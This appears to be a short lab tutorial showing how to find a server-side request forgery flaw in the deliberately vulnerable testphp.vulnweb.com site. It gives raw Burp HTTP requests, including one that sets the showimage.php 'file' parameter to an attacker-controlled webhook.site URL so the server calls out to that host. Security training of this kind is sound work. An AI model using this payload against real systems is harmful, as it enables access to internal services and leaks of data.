Identify SSRF( Server Side Request Forgery) in http://testphp.vulnweb.com/

What is SSRF?

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization’s infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials. (source- https://portswigger.net/web-security/ssrf)

So lets identify SSRF in http://testphp.vulnweb.com/ lab

1. Lets capture the request of home page of http://testphp.vulnweb.com/ in burp and spider the request.

GET / HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

2. Send the request to spider and identify as many endpoints as possible and we choose an endpoint with param “file=”

GET /showimage.php?file=./pictures/5.jpg HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1

3. Replace the value of file parameter with attacker controlled domain (you can use burp collaborator or simply get your unique url from https://webhook.site/ or https://requestcatcher.com/ or https://requestbin.com/.

Request

GET /showimage.php?file=https://webhook.site/1bdcb7a2-06c7-4c10-919a-654a5a2cac0a HTTP/1.1
Host: testphp.vulnweb.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://testphp.vulnweb.com/listproducts.php?cat=1

Response

HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Wed, 07 Jul 2021 08:55:45 GMT
Content-Type: image/jpeg
Connection: close
X-Powered-By: PHP/5.6.40–38+ubuntu20.04.1+deb.sury.org+1
Content-Length: 0

4. Lets see if the target interacted with the attacker controlled domain

Yes there is interaction to the attacker controlled unique url and the IP address belongs to the target. In this way we identify, http://testphp.vulnweb.com/ is vulnerable to ssrf.

Enjoy!